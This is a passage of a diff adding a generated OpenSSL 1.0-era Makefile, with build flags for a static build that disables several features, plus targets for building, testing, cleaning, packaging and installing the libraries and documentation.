+DEPFLAG= -DOPENSSL_NO_COMP -DOPENSSL_NO_DTLS1 -DOPENSSL_NO_EC -DOPENSSL_NO_EC_NISTP_64_GCC_128 -DOPENSSL_NO_ECDH -DOPENSSL_NO_ECDSA -DOPENSSL_NO_ENGINE -DOPENSSL_NO_GMP -DOPENSSL_NO_GOST -DOPENSSL_NO_IDEA -DOPENSSL_NO_JPAKE -DOPENSSL_NO_LIBUNBOUND -DOPENSSL_NO_MD2 -DOPENSSL_NO_PSK -DOPENSSL_NO_RC5 -DOPENSSL_NO_RFC3779 -DOPENSSL_NO_SCTP -DOPENSSL_NO_SRP -DOPENSSL_NO_SSL_TRACE -DOPENSSL_NO_SSL2 -DOPENSSL_NO_SSL3 -DOPENSSL_NO_STORE -DOPENSSL_NO_UNIT_TEST
+PEX_LIBS= 
+EX_LIBS= -static
+EXE_EXT= 
+ARFLAGS= 
+AR= ar $(ARFLAGS) r
+RANLIB= /usr/bin/ranlib
+NM= nm
+PERL= /usr/bin/perl
+TAR= tar
+TARFLAGS= --no-recursion
+MAKEDEPPROG=makedepend
+LIBDIR=lib
+
+# We let the C compiler driver to take care of .s files. This is done in
+# order to be excused from maintaining a separate set of architecture
+# dependent assembler flags. E.g. if you throw -mcpu=ultrasparc at SPARC
+# gcc, then the driver will automatically translate it to -xarch=v8plus
+# and pass it down to assembler.
+AS=$(CC) -c
+ASFLAG=$(CFLAG)
+
+# For x86 assembler: Set PROCESSOR to 386 if you want to support
+# the 80386.
+PROCESSOR= 
+
+# CPUID module collects small commonly used assembler snippets
+CPUID_OBJ= mem_clr.o
+BN_ASM= bn_asm.o
+EC_ASM= 
+DES_ENC= des_enc.o fcrypt_b.o
+AES_ENC= aes_core.o aes_cbc.o
+BF_ENC= bf_enc.o
+CAST_ENC= c_enc.o
+RC4_ENC= rc4_enc.o rc4_skey.o
+RC5_ENC= rc5_enc.o
+MD5_ASM_OBJ= 
+SHA1_ASM_OBJ= 
+RMD160_ASM_OBJ= 
+WP_ASM_OBJ= wp_block.o
+CMLL_ENC= camellia.o cmll_misc.o cmll_cbc.o
+MODES_ASM_OBJ= 
+ENGINES_ASM_OBJ= 
+PERLASM_SCHEME= elf
+
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+
+# Zlib stuff
+ZLIB_INCLUDE=
+LIBZLIB=
+
+# TOP level FIPS install directory.
+FIPSDIR=/usr/local/ssl/fips-2.0
+
+# This is the location of fipscanister.o and friends.
+# The FIPS module build will place it $(INSTALLTOP)/lib
+# but since $(INSTALLTOP) can only take the default value
+# when the module is built it will be in /usr/local/ssl/lib
+# $(INSTALLTOP) for this build may be different so hard
+# code the path.
+
+FIPSLIBDIR=
+
+# The location of the library which contains fipscanister.o
+# normally it will be libcrypto unless fipsdso is set in which
+# case it will be libfips. If not compiling in FIPS mode at all
+# this is empty making it a useful test for a FIPS compile.
+
+FIPSCANLIB=
+
+# Shared library base address. Currently only used on Windows.
+#
+
+BASEADDR=0xFB00000
+
+DIRS=   crypto ssl apps test tools
+ENGDIRS= 
+SHLIBDIRS= crypto ssl
+
+# dirs in crypto to build
+SDIRS=  \
+	objects \
+	md4 md5 sha mdc2 hmac ripemd whrlpool \
+	des aes rc2 rc4 bf cast camellia seed modes \
+	bn rsa dsa dh dso \
+	buffer bio stack lhash rand err \
+	evp asn1 pem x509 x509v3 conf txt_db pkcs7 pkcs12 ocsp ui krb5 \
+	cms pqueue ts cmac
+# keep in mind that the above list is adjusted by ./Configure
+# according to no-xxx arguments...
+
+# tests to perform.  "alltests" is a special word indicating that all tests
+# should be performed.
+TESTS = alltests
+
+MAKEFILE= Makefile
+
+MANDIR=$(OPENSSLDIR)/man
+MAN1=1
+MAN3=3
+MANSUFFIX=
+HTMLSUFFIX=html
+HTMLDIR=$(OPENSSLDIR)/html
+SHELL=/bin/sh
+
+TOP=    .
+ONEDIRS=out tmp
+EDIRS=  times doc bugs util include certs ms shlib mt demos perl sf dep VMS
+WDIRS=  windows
+LIBS=   libcrypto.a libssl.a
+SHARED_CRYPTO=libcrypto$(SHLIB_EXT)
+SHARED_SSL=libssl$(SHLIB_EXT)
+SHARED_LIBS=
+SHARED_LIBS_LINK_EXTS=.so.$(SHLIB_MAJOR) .so
+SHARED_LDFLAGS=-m64
+
+GENERAL=        Makefile
+BASENAME=       openssl
+NAME=           $(BASENAME)-$(VERSION)
+TARFILE=        $(NAME).tar
+WTARFILE=       $(NAME)-win.tar
+EXHEADER=       e_os2.h
+HEADER=         e_os.h
+
+all: Makefile build_all openssl.pc libssl.pc libcrypto.pc
+
+# as we stick to -e, CLEARENV ensures that local variables in lower
+# Makefiles remain local and variable. $${VAR+VAR} is tribute to Korn
+# shell, which [annoyingly enough] terminates unset with error if VAR
+# is not present:-( TOP= && unset TOP is tribute to HP-UX /bin/sh,
+# which terminates unset with error if no variable was present:-(
+CLEARENV=	TOP= && unset TOP $${LIB+LIB} $${LIBS+LIBS}	\
+		$${INCLUDE+INCLUDE} $${INCLUDES+INCLUDES}	\
+		$${DIR+DIR} $${DIRS+DIRS} $${SRC+SRC}		\
+		$${LIBSRC+LIBSRC} $${LIBOBJ+LIBOBJ} $${ALL+ALL}	\
+		$${EXHEADER+EXHEADER} $${HEADER+HEADER}		\
+		$${GENERAL+GENERAL} $${CFLAGS+CFLAGS}		\
+		$${ASFLAGS+ASFLAGS} $${AFLAGS+AFLAGS}		\
+		$${LDCMD+LDCMD} $${LDFLAGS+LDFLAGS} $${SCRIPTS+SCRIPTS}	\
+		$${SHAREDCMD+SHAREDCMD} $${SHAREDFLAGS+SHAREDFLAGS}	\
+		$${SHARED_LIB+SHARED_LIB} $${LIBEXTRAS+LIBEXTRAS}
+
+BUILDENV=	PLATFORM='$(PLATFORM)' PROCESSOR='$(PROCESSOR)' \
+		CC='$(CC)' CFLAG='$(CFLAG)' 			\
+		AS='$(CC)' ASFLAG='$(CFLAG) -c'			\
+		AR='$(AR)' NM='$(NM)' RANLIB='$(RANLIB)'	\
+		CROSS_COMPILE='$(CROSS_COMPILE)'	\
+		PERL='$(PERL)' ENGDIRS='$(ENGDIRS)'		\
+		SDIRS='$(SDIRS)' LIBRPATH='$(INSTALLTOP)/$(LIBDIR)'	\
+		INSTALL_PREFIX='$(INSTALL_PREFIX)'		\
+		INSTALLTOP='$(INSTALLTOP)' OPENSSLDIR='$(OPENSSLDIR)'	\
+		LIBDIR='$(LIBDIR)'				\
+		MAKEDEPEND='$$$${TOP}/util/domd $$$${TOP} -MD $(MAKEDEPPROG)' \
+		DEPFLAG='-DOPENSSL_NO_DEPRECATED $(DEPFLAG)'	\
+		MAKEDEPPROG='$(MAKEDEPPROG)'			\
+		SHARED_LDFLAGS='$(SHARED_LDFLAGS)'		\
+		KRB5_INCLUDES='$(KRB5_INCLUDES)' LIBKRB5='$(LIBKRB5)'	\
+		ZLIB_INCLUDE='$(ZLIB_INCLUDE)' LIBZLIB='$(LIBZLIB)'	\
+		EXE_EXT='$(EXE_EXT)' SHARED_LIBS='$(SHARED_LIBS)'	\
+		SHLIB_EXT='$(SHLIB_EXT)' SHLIB_TARGET='$(SHLIB_TARGET)'	\
+		PEX_LIBS='$(PEX_LIBS)' EX_LIBS='$(EX_LIBS)'	\
+		CPUID_OBJ='$(CPUID_OBJ)' BN_ASM='$(BN_ASM)'	\
+		EC_ASM='$(EC_ASM)' DES_ENC='$(DES_ENC)' 	\
+		AES_ENC='$(AES_ENC)' CMLL_ENC='$(CMLL_ENC)'	\
+		BF_ENC='$(BF_ENC)' CAST_ENC='$(CAST_ENC)'	\
+		RC4_ENC='$(RC4_ENC)' RC5_ENC='$(RC5_ENC)'	\
+		SHA1_ASM_OBJ='$(SHA1_ASM_OBJ)'			\
+		MD5_ASM_OBJ='$(MD5_ASM_OBJ)'			\
+		RMD160_ASM_OBJ='$(RMD160_ASM_OBJ)'		\
+		WP_ASM_OBJ='$(WP_ASM_OBJ)'			\
+		MODES_ASM_OBJ='$(MODES_ASM_OBJ)'		\
+		ENGINES_ASM_OBJ='$(ENGINES_ASM_OBJ)'		\
+		PERLASM_SCHEME='$(PERLASM_SCHEME)'		\
+		FIPSLIBDIR='${FIPSLIBDIR}'			\
+		FIPSDIR='${FIPSDIR}'				\
+		FIPSCANLIB="$${FIPSCANLIB:-$(FIPSCANLIB)}"	\
+		THIS=$${THIS:-$@} MAKEFILE=Makefile MAKEOVERRIDES=
+# MAKEOVERRIDES= effectively "equalizes" GNU-ish and SysV-ish make flavors,
+# which in turn eliminates ambiguities in variable treatment with -e.
+
+# BUILD_CMD is a generic macro to build a given target in a given
+# subdirectory.  The target must be given through the shell variable
+# `target' and the subdirectory to build in must be given through `dir'.
+# This macro shouldn't be used directly, use RECURSIVE_BUILD_CMD or
+# BUILD_ONE_CMD instead.
+#
+# BUILD_ONE_CMD is a macro to build a given target in a given
+# subdirectory if that subdirectory is part of $(DIRS).  It requires
+# exactly the same shell variables as BUILD_CMD.
+#
+# RECURSIVE_BUILD_CMD is a macro to build a given target in all
+# subdirectories defined in $(DIRS).  It requires that the target
+# is given through the shell variable `target'.
+BUILD_CMD=  if [ -d "$$dir" ]; then \
+	    (	cd $$dir && echo "making $$target in $$dir..." && \
+		$(CLEARENV) && $(MAKE) -e $(BUILDENV) TOP=.. DIR=$$dir $$target \
+	    ) || exit 1; \
+	    fi
+RECURSIVE_BUILD_CMD=for dir in $(DIRS); do $(BUILD_CMD); done
+BUILD_ONE_CMD=\
+	if expr " $(DIRS) " : ".* $$dir " >/dev/null 2>&1; then \
+		$(BUILD_CMD); \
+	fi
+
+reflect:
+	@[ -n "$(THIS)" ] && $(CLEARENV) && $(MAKE) $(THIS) -e $(BUILDENV)
+
+sub_all: build_all
+build_all: build_libs build_apps build_tests build_tools
+
+build_libs: build_crypto build_ssl build_engines
+
+build_crypto:
+	@dir=crypto; target=all; $(BUILD_ONE_CMD)
+build_ssl:
+	@dir=ssl; target=all; $(BUILD_ONE_CMD)
+build_engines:
+	@dir=engines; target=all; $(BUILD_ONE_CMD)
+build_apps:
+	@dir=apps; target=all; $(BUILD_ONE_CMD)
+build_tests:
+	@dir=test; target=all; $(BUILD_ONE_CMD)
+build_tools:
+	@dir=tools; target=all; $(BUILD_ONE_CMD)
+
+all_testapps: build_libs build_testapps
+build_testapps:
+	@dir=crypto; target=testapps; $(BUILD_ONE_CMD)
+
+fips_premain_dso$(EXE_EXT): libcrypto.a
+	[ -z "$(FIPSCANLIB)" ] || $(CC) $(CFLAG) -Iinclude \
+		-DFINGERPRINT_PREMAIN_DSO_LOAD -o $@  \
+		$(FIPSLIBDIR)fips_premain.c $(FIPSLIBDIR)fipscanister.o \
+		libcrypto.a $(EX_LIBS)
+
+libcrypto$(SHLIB_EXT): libcrypto.a fips_premain_dso$(EXE_EXT)
+	@if [ "$(SHLIB_TARGET)" != "" ]; then \
+		if [ "$(FIPSCANLIB)" = "libcrypto" ]; then \
+			FIPSLD_LIBCRYPTO=libcrypto.a ; \
+			FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; \
+			export CC FIPSLD_CC FIPSLD_LIBCRYPTO; \
+		fi; \
+		$(MAKE) -e SHLIBDIRS=crypto  CC="$${CC:-$(CC)}" build-shared && \
+		(touch -c fips_premain_dso$(EXE_EXT) || :); \
+	else \
+		echo "There's no support for shared libraries on this platform" >&2; \
+		exit 1; \
+	fi
+
+libssl$(SHLIB_EXT): libcrypto$(SHLIB_EXT) libssl.a
+	@if [ "$(SHLIB_TARGET)" != "" ]; then \
+		$(MAKE) SHLIBDIRS=ssl SHLIBDEPS='-lcrypto' build-shared; \
+	else \
+		echo "There's no support for shared libraries on this platform" >&2; \
+		exit 1; \
+	fi
+
+clean-shared:
+	@set -e; for i in $(SHLIBDIRS); do \
+		if [ -n "$(SHARED_LIBS_LINK_EXTS)" ]; then \
+			tmp="$(SHARED_LIBS_LINK_EXTS)"; \
+			for j in $${tmp:-x}; do \
+				( set -x; rm -f lib$$i$$j ); \
+			done; \
+		fi; \
+		( set -x; rm -f lib$$i$(SHLIB_EXT) ); \
+		if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+			( set -x; rm -f cyg$$i$(SHLIB_EXT) lib$$i$(SHLIB_EXT).a ); \
+		fi; \
+	done
+
+link-shared:
+	@ set -e; for i in $(SHLIBDIRS); do \
+		$(MAKE) -f $(HERE)/Makefile.shared -e $(BUILDENV) \
+			LIBNAME=$$i LIBVERSION=$(SHLIB_MAJOR).$(SHLIB_MINOR) \
+			LIBCOMPATVERSIONS=";$(SHLIB_VERSION_HISTORY)" \
+			symlink.$(SHLIB_TARGET); \
+		libs="$$libs -l$$i"; \
+	done
+
+build-shared: do_$(SHLIB_TARGET) link-shared
+
+do_$(SHLIB_TARGET):
+	@ set -e; libs='-L. $(SHLIBDEPS)'; for i in $(SHLIBDIRS); do \
+		if [ "$$i" = "ssl" -a -n "$(LIBKRB5)" ]; then \
+			libs="$(LIBKRB5) $$libs"; \
+		fi; \
+		$(CLEARENV) && $(MAKE) -f Makefile.shared -e $(BUILDENV) \
+			LIBNAME=$$i LIBVERSION=$(SHLIB_MAJOR).$(SHLIB_MINOR) \
+			LIBCOMPATVERSIONS=";$(SHLIB_VERSION_HISTORY)" \
+			LIBDEPS="$$libs $(EX_LIBS)" \
+			link_a.$(SHLIB_TARGET); \
+		libs="-l$$i $$libs"; \
+	done
+
+libcrypto.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL-libcrypto'; \
+	    echo 'Description: OpenSSL cryptography library'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires: '; \
+	    echo 'Libs: -L$${libdir} -lcrypto'; \
+	    echo 'Libs.private: $(EX_LIBS)'; \
+	    echo 'Cflags: -I$${includedir} $(KRB5_INCLUDES)' ) > libcrypto.pc
+
+libssl.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL-libssl'; \
+	    echo 'Description: Secure Sockets Layer and cryptography libraries'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires.private: libcrypto'; \
+	    echo 'Libs: -L$${libdir} -lssl'; \
+	    echo 'Libs.private: $(EX_LIBS)'; \
+	    echo 'Cflags: -I$${includedir} $(KRB5_INCLUDES)' ) > libssl.pc
+
+openssl.pc: Makefile
+	@ ( echo 'prefix=$(INSTALLTOP)'; \
+	    echo 'exec_prefix=$${prefix}'; \
+	    echo 'libdir=$${exec_prefix}/$(LIBDIR)'; \
+	    echo 'includedir=$${prefix}/include'; \
+	    echo ''; \
+	    echo 'Name: OpenSSL'; \
+	    echo 'Description: Secure Sockets Layer and cryptography libraries and tools'; \
+	    echo 'Version: '$(VERSION); \
+	    echo 'Requires: libssl libcrypto' ) > openssl.pc
+
+Makefile: Makefile.org Configure config
+	@echo "Makefile is older than Makefile.org, Configure or config."
+	@echo "Reconfigure the source tree (via './config' or 'perl Configure'), please."
+	@false
+
+libclean:
+	rm -f *.map *.so *.so.* *.dylib *.dll engines/*.so engines/*.dll engines/*.dylib *.a engines/*.a */lib */*/lib
+
+clean:	libclean
+	rm -f shlib/*.o *.o core a.out fluff rehash.time testlog make.log cctest cctest.c
+	@set -e; target=clean; $(RECURSIVE_BUILD_CMD)
+	rm -f $(LIBS)
+	rm -f openssl.pc libssl.pc libcrypto.pc
+	rm -f speed.* .pure
+	rm -f $(TARFILE)
+	@set -e; for i in $(ONEDIRS) ;\
+	do \
+	rm -fr $$i/*; \
+	done
+
+makefile.one: files
+	$(PERL) util/mk1mf.pl >makefile.one; \
+	sh util/do_ms.sh
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile > $(TOP)/MINFO
+	@set -e; target=files; $(RECURSIVE_BUILD_CMD)
+
+links:
+	@$(PERL) $(TOP)/util/mkdir-p.pl include/openssl
+	@$(PERL) $(TOP)/util/mklink.pl include/openssl $(EXHEADER)
+	@set -e; target=links; $(RECURSIVE_BUILD_CMD)
+
+gentests:
+	@(cd test && echo "generating dummy tests (if needed)..." && \
+	$(CLEARENV) && $(MAKE) -e $(BUILDENV) TESTS='$(TESTS)' OPENSSL_DEBUG_MEMORY=on generate );
+
+dclean:
+	rm -rf *.bak include/openssl certs/.0
+	@set -e; target=dclean; $(RECURSIVE_BUILD_CMD)
+
+rehash: rehash.time
+rehash.time: certs apps
+	@if [ -z "$(CROSS_COMPILE)" ]; then \
+		(OPENSSL="`pwd`/util/opensslwrap.sh"; \
+		[ -x "apps/openssl.exe" ] && OPENSSL="apps/openssl.exe" || :; \
+		OPENSSL_DEBUG_MEMORY=on; \
+		export OPENSSL OPENSSL_DEBUG_MEMORY; \
+		$(PERL) tools/c_rehash certs/demo) && \
+		touch rehash.time; \
+	else :; fi
+
+test:   tests
+
+tests: rehash
+	@(cd test && echo "testing..." && \
+	$(CLEARENV) && $(MAKE) -e $(BUILDENV) TOP=.. TESTS='$(TESTS)' OPENSSL_DEBUG_MEMORY=on OPENSSL_CONF=../apps/openssl.cnf tests );
+	OPENSSL_CONF=apps/openssl.cnf util/opensslwrap.sh version -a
+
+report:
+	@$(PERL) util/selftest.pl
+
+depend:
+	@set -e; target=depend; $(RECURSIVE_BUILD_CMD)
+
+lint:
+	@set -e; target=lint; $(RECURSIVE_BUILD_CMD)
+
+tags:
+	rm -f TAGS
+	find . -name '[^.]*.[ch]' | xargs etags -a
+
+errors:
+	$(PERL) util/ck_errf.pl -strict */*.c */*/*.c
+	$(PERL) util/mkerr.pl -recurse -write
+	(cd engines; $(MAKE) PERL=$(PERL) errors)
+
+stacks:
+	$(PERL) util/mkstack.pl -write
+
+util/libeay.num::
+	$(PERL) util/mkdef.pl crypto update
+
+util/ssleay.num::
+	$(PERL) util/mkdef.pl ssl update
+
+crypto/objects/obj_dat.h: crypto/objects/obj_dat.pl crypto/objects/obj_mac.h
+	$(PERL) crypto/objects/obj_dat.pl crypto/objects/obj_mac.h crypto/objects/obj_dat.h
+crypto/objects/obj_mac.h: crypto/objects/objects.pl crypto/objects/objects.txt crypto/objects/obj_mac.num
+	$(PERL) crypto/objects/objects.pl crypto/objects/objects.txt crypto/objects/obj_mac.num crypto/objects/obj_mac.h
+crypto/objects/obj_xref.h: crypto/objects/objxref.pl crypto/objects/obj_xref.txt crypto/objects/obj_mac.num
+	$(PERL) crypto/objects/objxref.pl crypto/objects/obj_mac.num crypto/objects/obj_xref.txt >crypto/objects/obj_xref.h
+
+apps/openssl-vms.cnf: apps/openssl.cnf
+	$(PERL) VMS/VMSify-conf.pl < apps/openssl.cnf > apps/openssl-vms.cnf
+
+crypto/bn/bn_prime.h: crypto/bn/bn_prime.pl
+	$(PERL) crypto/bn/bn_prime.pl >crypto/bn/bn_prime.h
+
+
+TABLE: Configure
+	(echo 'Output of `Configure TABLE'"':"; \
+	$(PERL) Configure TABLE) > TABLE
+
+update: errors stacks util/libeay.num util/ssleay.num crypto/objects/obj_dat.h crypto/objects/obj_xref.h apps/openssl-vms.cnf crypto/bn/bn_prime.h TABLE depend
+
+# Build distribution tar-file. As the list of files returned by "find" is
+# pretty long, on several platforms a "too many arguments" error or similar
+# would occur. Therefore the list of files is temporarily stored into a file
+# and read directly, requiring GNU-Tar. Call "make TAR=gtar dist" if the normal
+# tar does not support the --files-from option.
+tar:
+	find . -type d -print | xargs chmod 755
+	find . -type f -print | xargs chmod a+r
+	find . -type f -perm -0100 -print | xargs chmod a+x
+	find * \! -path CVS/\* \! -path \*/CVS/\* \! -name CVS \! -name .cvsignore \! -name STATUS \! -name TABLE | sort > ../$(TARFILE).list; \
+	$(TAR) $(TARFLAGS) --files-from ../$(TARFILE).list -cvf - | \
+	tardy --user_number=0  --user_name=openssl \
+	      --group_number=0 --group_name=openssl \
+	      --prefix=openssl-$(VERSION) - |\
+	gzip --best >../$(TARFILE).gz; \
+	rm -f ../$(TARFILE).list; \
+	ls -l ../$(TARFILE).gz
+
+tar-snap:
+	@$(TAR) $(TARFLAGS) -cvf - \
+		`find * \! -path CVS/\* \! -path \*/CVS/\* \! -name CVS \! -name .cvsignore \! -name STATUS \! -name TABLE \! -name '*.o' \! -name '*.a' \! -name '*.so' \! -name '*.so.*'  \! -name 'openssl' \! -name '*test' \! -name '.#*' \! -name '*~' | sort` |\
+	tardy --user_number=0  --user_name=openssl \
+	      --group_number=0 --group_name=openssl \
+	      --prefix=openssl-$(VERSION) - > ../$(TARFILE);\
+	ls -l ../$(TARFILE)
+
+dist:   
+	$(PERL) Configure dist
+	@$(MAKE) dist_pem_h
+	@$(MAKE) SDIRS='$(SDIRS)' clean
+	@$(MAKE) TAR='$(TAR)' TARFLAGS='$(TARFLAGS)' tar
+
+dist_pem_h:
+	(cd crypto/pem; $(MAKE) -e $(BUILDENV) pem.h; $(MAKE) clean)
+
+install: all install_docs install_sw
+
+install_sw:
+	@$(PERL) $(TOP)/util/mkdir-p.pl $(INSTALL_PREFIX)$(INSTALLTOP)/bin \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR) \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig \
+		$(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/misc \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/certs \
+		$(INSTALL_PREFIX)$(OPENSSLDIR)/private
+	@set -e; headerlist="$(EXHEADER)"; for i in $$headerlist;\
+	do \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+	@set -e; target=install; $(RECURSIVE_BUILD_CMD)
+	@set -e; liblist="$(LIBS)"; for i in $$liblist ;\
+	do \
+		if [ -f "$$i" ]; then \
+		(       echo installing $$i; \
+			cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			$(RANLIB) $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+			mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i ); \
+		fi; \
+	done;
+	@set -e; if [ -n "$(SHARED_LIBS)" ]; then \
+		tmp="$(SHARED_LIBS)"; \
+		for i in $${tmp:-x}; \
+		do \
+			if [ -f "$$i" -o -f "$$i.a" ]; then \
+			(       echo installing $$i; \
+				if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+					c=`echo $$i | sed 's/^lib\(.*\)\.dll\.a/cyg\1-$(SHLIB_VERSION_NUMBER).dll/'`; \
+					cp $$c $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new; \
+					chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$c; \
+					cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i; \
+				else \
+					cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i; \
+				fi ); \
+				if expr $(PLATFORM) : 'mingw' > /dev/null; then \
+				(	case $$i in \
+						*crypto*) i=libeay32.dll;; \
+						*ssl*)    i=ssleay32.dll;; \
+					esac; \
+					echo installing $$i; \
+	 				cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 				chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 				mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+				fi; \
+			fi; \
+		done; \
+		(	here="`pwd`"; \
+			cd $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR); \
+			$(MAKE) -f $$here/Makefile HERE="$$here" link-shared ); \
+		if [ "$(INSTALLTOP)" != "/usr" ]; then \
+			echo 'OpenSSL shared libraries have been installed in:'; \
+			echo '  $(INSTALLTOP)'; \
+			echo ''; \
+			sed -e '1,/^$$/d' doc/openssl-shared.txt; \
+		fi; \
+	fi
+	cp libcrypto.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/libcrypto.pc
+	cp libssl.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/libssl.pc
+	cp openssl.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/openssl.pc
+
+install_html_docs:
+	here="`pwd`"; \
+	filecase=; \
+	case "$(PLATFORM)" in DJGPP|Cygwin*|mingw*|darwin*-*-cc) \
+		filecase=-i; \
+	esac; \
+	for subdir in apps crypto ssl; do \
+		mkdir -p $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir; \
+		for i in doc/$$subdir/*.pod; do \
+			fn=`basename $$i .pod`; \
+			echo "installing html/$$fn.$(HTMLSUFFIX)"; \
+			cat $$i \
+			| sed -r 's/L<([^)]*)(\([0-9]\))?\|([^)]*)(\([0-9]\))?>/L<\1|\3>/g' \
+			| pod2html --podroot=doc --htmlroot=.. --podpath=apps:crypto:ssl \
+			| sed -r 's/<!DOCTYPE.*//g' \
+			> $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir/$$fn.$(HTMLSUFFIX); \
+			$(PERL) util/extract-names.pl < $$i | \
+				grep -v $$filecase "^$$fn\$$" | \
+				(cd $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir; \
+				 while read n; do \
+					PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$(HTMLSUFFIX) "$$n".$(HTMLSUFFIX); \
+				 done); \
+		done; \
+	done
+
+install_docs:
+	@$(PERL) $(TOP)/util/mkdir-p.pl \
+		$(INSTALL_PREFIX)$(MANDIR)/man1 \
+		$(INSTALL_PREFIX)$(MANDIR)/man3 \
+		$(INSTALL_PREFIX)$(MANDIR)/man5 \
+		$(INSTALL_PREFIX)$(MANDIR)/man7
+	@pod2man="`cd ./util; ./pod2mantest $(PERL)`"; \
+	here="`pwd`"; \
+	filecase=; \
+	case "$(PLATFORM)" in DJGPP|Cygwin*|mingw*|darwin*-*-cc) \
+		filecase=-i; \
+	esac; \
+	set -e; for i in doc/apps/*.pod; do \
+		fn=`basename $$i .pod`; \
+		sec=`$(PERL) util/extract-section.pl 1 < $$i`; \
+		echo "installing man$$sec/$$fn.$${sec}$(MANSUFFIX)"; \
+		(cd `$(PERL) util/dirname.pl $$i`; \
+		sh -c "$$pod2man \
+			--section=$$sec --center=OpenSSL \
+			--release=$(VERSION) `basename $$i`") \
+			>  $(INSTALL_PREFIX)$(MANDIR)/man$$sec/$$fn.$${sec}$(MANSUFFIX); \
+		$(PERL) util/extract-names.pl < $$i | \
+			(grep -v $$filecase "^$$fn\$$"; true) | \
+			(grep -v "[	]"; true) | \
+			(cd $(INSTALL_PREFIX)$(MANDIR)/man$$sec/; \
+			 while read n; do \
+				PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$${sec}$(MANSUFFIX) "$$n".$${sec}$(MANSUFFIX); \
+			 done); \
+	done; \
+	set -e; for i in doc/crypto/*.pod doc/ssl/*.pod; do \
+		fn=`basename $$i .pod`; \
+		sec=`$(PERL) util/extract-section.pl 3 < $$i`; \
+		echo "installing man$$sec/$$fn.$${sec}$(MANSUFFIX)"; \
+		(cd `$(PERL) util/dirname.pl $$i`; \
+		sh -c "$$pod2man \
+			--section=$$sec --center=OpenSSL \
+			--release=$(VERSION) `basename $$i`") \
+			>  $(INSTALL_PREFIX)$(MANDIR)/man$$sec/$$fn.$${sec}$(MANSUFFIX); \
+		$(PERL) util/extract-names.pl < $$i | \
+			(grep -v $$filecase "^$$fn\$$"; true) | \
+			(grep -v "[	]"; true) | \
+			(cd $(INSTALL_PREFIX)$(MANDIR)/man$$sec/; \
+			 while read n; do \
+				PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$${sec}$(MANSUFFIX) "$$n".$${sec}$(MANSUFFIX); \
+			 done); \
+	done
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
